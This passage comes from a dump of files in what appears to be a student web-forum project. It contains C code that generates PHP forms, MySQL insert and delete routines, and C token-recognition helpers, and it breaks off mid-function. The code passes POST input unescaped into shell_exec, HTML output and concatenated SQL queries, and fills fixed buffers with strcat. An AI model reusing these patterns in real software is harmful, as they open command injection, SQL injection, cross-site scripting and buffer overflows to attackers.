value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"dep\", 3) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(varBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tstrcpy(depBuffer, \"<?php echo \\\"<input type=\\\\\\\"hidden\\\\\\\" value=\\\\\\\"\\\".$_POST[\\\"\");\n\tstrcat(depBuffer, varBuffer);\n\tstrcat(depBuffer, \"\\\"].\\\"\\\\\\\" name=\\\\\\\"\");\n\tstrcat(depBuffer, varBuffer);\n\tstrcat(depBuffer, \"\\\\\\\" form=\\\\\\\"\");\n\tstrcat(depBuffer, idBuffer);\n\tstrcat(depBuffer, \"\\\\\\\" \");\n\tstrcat(depBuffer, tagArgs);\n\tstrcat(depBuffer, \">\\\"; ?>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(depBuffer) + 1));\n\tstrcpy(finalTag, depBuffer);\n\n\treturn finalTag;\n}\n\n\nchar* createAdd(char* addTag)\n{\n\tchar buffer[2048];\n\n\tchar* finalTag;\n\n\tbuffer[0] = '\\0';\n\tstrcat(buffer, \"<?php\\n\");\n\tstrcat(buffer, \" echo \\\"<form id=\\\\\\\"adduser\\\\\\\" method=\\\\\\\"post\\\\\\\" action=\\\\\\\"addauthor.php\\\\\\\">\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<input type=\\\\\\\"text\\\\\\\" name=\\\\\\\"newstreams\\\\\\\"><br>\\\";\\n\");\n\tstrcat(buffer, \"$streamsraw = shell_exec(\\\"./db streams \\\\\\\"\\\".$_POST[\\\"username\\\"].\\\"\\\\\\\" strm 0 pdate\\\");\\n\");\n\tstrcat(buffer, \"$streams = explode(',', $streamsraw);\\n\");\n\tstrcat(buffer, \"foreach($streams as $stream)\\n{\\n $stream = trim($stream); echo \\\"<input type=\\\\\\\"checkbox\\\\\\\" name=\\\\\\\"streams[]\\\\\\\" value=\\\\\\\"$stream\\\\\\\">$stream<br>\\\";\\n}\\n\");\n\tstrcat(buffer, \"echo \\\"<input type=\\\\\\\"submit\\\\\\\" value=\\\\\\\"add\\\\\\\" name=\\\\\\\"action\\\\\\\"><input type=\\\\\\\"submit\\\\\\\" value=\\\\\\\"remove\\\\\\\" name=\\\\\\\"action\\\\\\\">\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"</form>\\\";\\n?>\");\n\t\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n\n\nchar* createView(char* viewTag)\n{\n\tchar buffer[2048];\n\n\tchar* finalTag;\n\n\tbuffer[0] = '\\0';\n\n\tstrcat(buffer, \"<?php\\n\");\n\n\tstrcat(buffer, \"echo \\\"<div id=\\\\\\\"view\\\\\\\">\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<p>$post</p>\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"</div>\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<form method=\\\\\\\"post\\\\\\\" action=\\\\\\\"view.php\\\\\\\" id=\\\\\\\"command\\\\\\\">\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"next\\\\\\\">Next</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"prev\\\\\\\">Previous</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"order\\\\\\\">Order</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"mark\\\\\\\">Mark All</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button form=\\\\\\\"switch\\\\\\\"type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"next\\\\\\\">Switch Streams</button>\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"</form>\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<form method=\\\\\\\"post\\\\\\\" action=\\\\\\\"switch.php\\\\\\\" id=\\\\\\\"switch\\\\\\\"></form>\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"?>\\n\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n\n\nchar* createPost(char* postTag)\n{\n\tchar buffer[2048];\n\tchar* finalTag;\n\n\tbuffer[0] = '\\0';\n\n\tstrcat(buffer, \"<?php\\n\");\n\tstrcat(buffer, \"echo \\\"<form id=\\\\\\\"post\\\\\\\" method=\\\\\\\"post\\\\\\\" action=\\\\\\\"post.php\\\\\\\">\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<textarea name=\\\\\\\"post\\\\\\\" rows=\\\\\\\"20\\\\\\\" cols=\\\\\\\"70\\\\\\\">\\\\n</textarea><br>\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<input type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"postpressed\\\\\\\" value=\\\\\\\"submit\\\\\\\">\\\\n</form>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"?>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n" }, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.6351351141929626, "avg_line_length": 11.333333015441895, "blob_id": "628e2666b3d46ea4a622e58cf468f0d547100750", "content_id": "71d4bf6bdcaaf740a0bf9f8458bcd1905dabaa3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 222, "license_type": "no_license", "max_line_length": 57, "num_lines": 18, "path": "/switch.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Change Streams</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\n\nexec(\"./create switch.wpml\", $output, $result);\ninclude \"interpret.php\";\n\n?>\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.554460883140564, "alphanum_fraction": 0.5810071229934692, "avg_line_length": 15.529411315917969, "blob_id": "bc94967fa3e8acdc1208bc60692d920218e76e36", "content_id": "c9415ad33ea8d7e3959699627a6eab0d81bc5b7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3654, "license_type": "no_license", "max_line_length": 136, "num_lines": 221, "path": "/stream.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"stream.h\"\n#include \"dbutils.h\"\n\n#include <time.h>\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n\n\nchar* compdate()\n{\n\tchar* tstmp;\n\ttime_t rawNow;\n\n\tstruct tm * now;\n\n\t/* gets the raw time from the clock */\n\trawNow = time(NULL);\n\tnow = localtime(&rawNow);\n\n\ttstmp = malloc(sizeof(char) * 15);\n\n\t/* YYYY MM DD HH mm SS */\n\tsprintf(tstmp, \"%04d%02d%02d%02d%02d%02d\", now->tm_year + 1900, now->tm_mon + 1, now->tm_mday, now->tm_hour, now->tm_min, now->tm_sec);\n\ttstmp[14] = '\\0';\n\n\treturn tstmp;\n}\n\n\nint updateStream(struct userPost* st)\n{\n\tchar query[256];\n\tchar post[1024];\n\tchar* pdate;\n\n\tMYSQL sql;\n\n\tquery[0] = '\\0';\n\tpost[0] = '\\0';\n\n\tif(st == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tmysql_init(&sql);\n\tmysql_options(&sql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(&sql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\tpdate = compdate();\n\n\tsprintf(post, \"Sender: %s\\nDate: %s\\n%s\", st->username, st->date, st->text);\n\n\tstrcpy(query, \"insert into posts values ('\");\n\tstrcat(query, st->streamname);\n\tstrcat(query, \"', '\");\n\tstrcat(query, st->username);\n\tstrcat(query, \"', '\");\n\tstrcat(query, pdate);\n\tstrcat(query, \"', '\");\n\tstrcat(query, post);\n\tstrcat(query, \"')\");\n\n\tmysql_query(&sql, query);\n\n\tmysql_close(&sql);\n\n\tfree(pdate);\n\treturn 0;\n}\n\nint addUser(char* username, char* list)\n{\n\tint i;\n\tint cpos;\n\tchar buffer[512];\n\n\tMYSQL sql;\n\n\tcpos = 0;\n\n\tif(username == NULL || list == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tmysql_init(&sql);\n\n\tmysql_options(&sql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(&sql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\t/* find all the commas */\n\tfor(i = 0; i < strlen(list); i++)\n\t{\n\t\tbuffer[cpos] = list[i];\n\t\tcpos ++;\n\n\t\t/* if we found a comma, we *should* have a complete file name */\n\t\tif(list[i] == ',' || i == strlen(list) - 1)\n\t\t{\n\t\t\tchar query[256];\n\n\t\t\tbuffer[cpos] = '\\0';\n\t\t\tquery[0] = '\\0';\n\n\t\t\tif(buffer[cpos - 1] == ',' || buffer[cpos - 1] == ' ')\n\t\t\t{\n\t\t\t\tbuffer[cpos - 1] = '\\0';\n\t\t\t}\n\n\t\t\tstrcat(query, \"insert into users values ('\");\n\t\t\tstrcat(query, username);\n\t\t\tstrcat(query, \"', '\");\n\t\t\tstrcat(query, buffer);\n\t\t\tstrcat(query, \"', '0')\");\n\n\t\t\tmysql_query(&sql, query);\n\n\t\t\tcpos = 0;\n\t\t\tbuffer[0] = '\\0';\n\n\t\t}\n\t}\n\n\tmysql_close(&sql);\n\treturn 0;\n}\n\nint removeUser(char* username, char* list)\n{\n\tint i;\n\tint cpos;\n\tchar buffer[256];\n\n\tMYSQL mysql;\n\n\tcpos = 0;\n\n\tif(username == NULL || list == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tmysql_init(&mysql);\n\n\tmysql_options(&mysql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(&mysql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\t/* find all the commas */\n\tfor(i = 0; i < strlen(list); i++)\n\t{\n\t\tbuffer[cpos] = list[i];\n\t\tcpos ++;\n\n\t\t/* if we found a comma, we *should* have a complete file name */\n\t\tif(list[i] == ',' || i == strlen(list) - 1)\n\t\t{\n\t\t\tchar query[256];\n\n\t\t\tquery[0] = '\\0';\n\t\t\tbuffer[cpos] = '\\0';\n\n\t\t\tif(buffer[cpos - 1] == ',')\n\t\t\t{\n\t\t\t\tbuffer[cpos - 1] = '\\0';\n\t\t\t}\n\n\n\t\t\tstrcat(query, \"delete from users where username='\");\n\t\t\tstrcat(query, username);\n\t\t\tstrcat(query, \"' and stream='\");\n\t\t\tstrcat(query, buffer);\n\t\t\tstrcat(query, \"'\");\n\n\t\t\tmysql_query(&mysql, query);\n\n\t\t\tbuffer[0] = '\\0';\n\t\t\tcpos = 0;\n\t\t}\n\t}\n\n\tmysql_close(&mysql);\n\n\treturn 0;\n}\n\nint checkIfPresent(char* fname, char* word)\n{\n\tchar line[1024];\n\tFILE* checkFile;\n\n\tcheckFile = fopen(fname, \"r\");\n\tif(checkFile == NULL)\n\t{\n\t\treturn 0;\n\t}\n\n\t/* check all lines in the file for word */\n\twhile(fgets(line, 1023, checkFile) != NULL)\n\t{\n\t\tif(strstr(line, word) != NULL)\n\t\t{\n\t\t\tfclose(checkFile);\n\t\t\treturn 1;\n\t\t}\n\t}\n\n\tfclose(checkFile);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.56634920835495, "alphanum_fraction": 0.5813756585121155, "avg_line_length": 17.881118774414062, "blob_id": "f0e761ccd01f39309bc901060dd3b527db6fa0f6", "content_id": "f90c290fcc8a3d4ddb9cabcf96184d42bbdeaa5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 18900, "license_type": "no_license", "max_line_length": 296, "num_lines": 1001, "path": "/recognize.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains functions that are used to identify special patterns\n * \tthat occur in c/cpp files, such as function calls/declarations, variables,\n * \tclass declarations, and other things.\n */\n#include\"recognize.h\"\n#include<ctype.h>\n#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n\nint nstrchr(char* string, char character)\n{\n\tint occurences;\n\tint length;\n\tint i;\n\n\tif(string == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tlength = strlen(string);\n\toccurences = 0;\n\n\tfor(i = 0; i < length; i++) /* loop through the characters in the string */\n\t{\n\t\tif(string[i] == character)\n\t\t{\n\t\t\toccurences ++;\n\t\t}\n\t}\n\n\treturn occurences;\n}\n\nint isValidName(char* name)\n{\n\tconst char* keywords[] = {\"auto\",\"break\",\"case\",\"char\",\"const\",\"continue\",\"default\",\"do\",\"double\",\"else\",\"extern\",\"float\",\"for\",\"goto\",\"if\",\"int\",\"long\",\"register\",\"return\",\"short\",\"signed\",\"sizeof\",\"static\",\"struct\",\"switch\",\"typedef\",\"union\",\"unsigned\",\"void\",\"volatile\",\"while\",\"class\",NULL};\n\n\tunsigned int i;\n\n\tif(name == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* if the first character is not an underscore or not alphabetical */\n\tif(!isalpha(name[0]) && name[0] != '_')\n\t{\n\t\treturn 0;\n\t}\n\n\t/* loop through the rest of the name */\n\tfor(i = 1; i < strlen(name); i++)\n\t{\n\t\tif(!isalpha(name[i]) && !isdigit(name[i]) && name[i] != '_')\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\ti = 0;\n\t/* loops through the keywords, NULL is placed at the end to protect from overflow. */\n\twhile(keywords[i] != NULL)\n\t{\n\t\t/* we do not want a variable to be named a keyword! */\n\t\tif(strcmp(name, keywords[i]) == 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\n\t\ti++;\n\t}\n\n\treturn 1;\n}\n\nchar getTypeID(Vector* tokens, int pos)\n{\n\tint i;\n\tint startPos;\n\n\n\t/* there are three stages to this check; we need to check in the following order:\n\t * 1-\tcheck local vars and parameters\n\t * 2-\tcheck global vars\n\t *\n\t * note that class variable were not included. This is because we should have\n\t * already called addThisRef and addThisArg prior to invoking this function. This\n\t * would cause all class variables to be prepended with \"this->\"\n\t */\n\n\t/* loop backwards, looking for a variable declaration. */\n\n\t/* gets the starting position of the program. */\n\tfor(i = pos; i >= 0; i--)\n\t{\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tstartPos = i;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tfor(i = startPos + 1; i <= pos; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\t/* return the first character of the current type identifier. */\n\t\t\t\t\treturn ((char*) tokens->contents[j])[0];\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\treturn 's';\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]) && strcmp(tokens->contents[j], \"*\") != 0)\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\t\t/* this block executing signifies that the function that we are in has been located */\n\t\telse if(isFunction(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* now we have to essentially make sure we find global variables. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\t/* return the first character of the current type identifier. */\n\t\t\t\t\treturn ((char*) tokens->contents[j])[0];\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\treturn 's';\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn '\\0';\n}\n\nchar* getType(Vector* tokens, int pos)\n{\n\tint i;\n\tint startPos;\n\n\t/* gets the starting position of the program. */\n\tfor(i = pos; i >= 0; i--)\n\t{\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tstartPos = i;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tfor(i = startPos + 1; i <= pos; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\n\t\t\tmultipleDeclaration = 0;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\tchar* str;\n\n\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t/* return the first character of the current type identifier. */\n\t\t\t\t\treturn str;\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\t\n\t\t\t\t\t\tchar* str;\n\t\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t\treturn str;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tmultipleDeclaration = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]) && strcmp(tokens->contents[j], \"*\") != 0)\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\t\t/* this block executing signifies that the function that we are in has been located */\n\t\telse if(isFunction(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* now we have to essentially make sure we find global variables. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\n\t\t\tmultipleDeclaration = 0;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\tchar* str;\n\n\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t/* return the first character of the current type identifier. */\n\t\t\t\t\treturn str;\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tchar* str;\n\t\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t\treturn str;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nint isValidType(char* type)\n{\n\tconst char* validAtomics[] = {\"auto\",\"char\",\"double\",\"float\",\"int\",\"long\",\"short\",\"void\",NULL};\n\tconst char* validPrefixes[] = {\"const\",\"extern\",\"register\",\"signed\",\"static\",\"struct\",\"union\",\"unsigned\",\"volatile\",NULL};\n\n\tint i;\n\n\tif(type == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\ti = 0;\n\n\t/* check if valid atomic type. */\n\twhile(validAtomics[i] != NULL)\n\t{\n\t\tif(strcmp(type, validAtomics[i]) == 0)\n\t\t{\n\t\t\treturn 1;\n\t\t}\n\t\ti++;\n\t}\n\n\ti = 0;\n\n\t/* check if valid prefix, like struct, etc. */\n\twhile(validPrefixes[i] != NULL)\n\t{\n\t\tif(strcmp(type, validPrefixes[i]) == 0)\n\t\t{\n\t\t\treturn 2;\n\t\t}\n\t\ti++;\n\t}\n\n\t/* if the type was class, essentially. */\n\tif(strcmp(type, \"class\") == 0)\n\t{\n\t\treturn 3;\n\t}\n\n\treturn 0;\n}\n\nint isClass(Vector* tokens, int pos)\n{\n\tint i;\n\tint classPresent;\n\tint validName;\n\tint validSuffix;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tif(pos < 0 || pos == tokens->length)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* check for class preceeding this location. */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\t/* if our preceeding token is a valid type or valid struct name */\n\t\tif(strcmp(tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tclassPresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* if the current token is a valid function name */\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tvalidName = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\t/* if the next token is an open parenthesis */\n\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tvalidSuffix= 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(classPresent && validName && validSuffix)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\n/**\n *\tcases to consider here:\n *\t0\t- not a valid function declaration\n *\t1\t- <c return type> <functionName>(<args>)\n *\t2\t- <modifier> <c return type> <functionName>(<args>)\n *\t3\t- <stuct> <structName> <functionName>(<args>)\n *\t4\t- <class> <className> <functionName>(<args>)\n */\nint isFunction(Vector* tokens, int pos)\n{\n\tint i;\n\tint typePresent;\n\tint nameValid;\n\tint suffixValid;\n\n\ttypePresent = 0;\n\tnameValid = 0;\n\tsuffixValid = 0;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\telse if(pos >= tokens->length || pos < 0)\n\t{\n\t\treturn -1;\n\t}\n\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(typePresent == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\t/* if our preceeding token is a valid type or valid struct name */\n\t\tif(isValidType(tokens->contents[i]) || isValidName(tokens->contents[i]) || strstr(\",\",tokens->contents[i]) != NULL)\n\t\t{\n\t\t\ttypePresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && strcmp(tokens->contents[i], \"*\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* if the current token is a valid function name */\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\t/* if the next token is an open parenthesis */\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tsuffixValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(typePresent && nameValid && suffixValid)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nint isFunctionCall(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint prevValid;\n\tint nameValid;\n\tint suffValid;\n\n\tprevValid = 0;\n\tnameValid = 0;\n\tsuffValid = 0;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(!isValidType(tokens->contents[i]) && !isValidName(tokens->contents[i]) && !isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\tprevValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tsuffValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\tif(prevValid && nameValid && suffValid)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nint isMemberFunctionCall(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint periodPresent;\n\tint nameValid;\n\tint hasBrackets;\n\n\tperiodPresent = 0;\n\tnameValid = 0;\n\thasBrackets = 0;\n\n\t/* checks for the period preceeding the function call */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(strcmp(tokens->contents[i], \".\") == 0)\n\t\t{\n\t\t\tperiodPresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\thasBrackets = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*) tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\treturn periodPresent && nameValid && hasBrackets;\t\n}\n\nint isFunctionPointer(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint returnValid;\n\tint prevSyntax;\n\tint nameValid;\n\tint postSyntax;\n\tint hasBrackets;\n\n\treturnValid = 0;\n\tprevSyntax = 0;\n\tnameValid = 0;\n\tpostSyntax = 0;\n\thasBrackets = 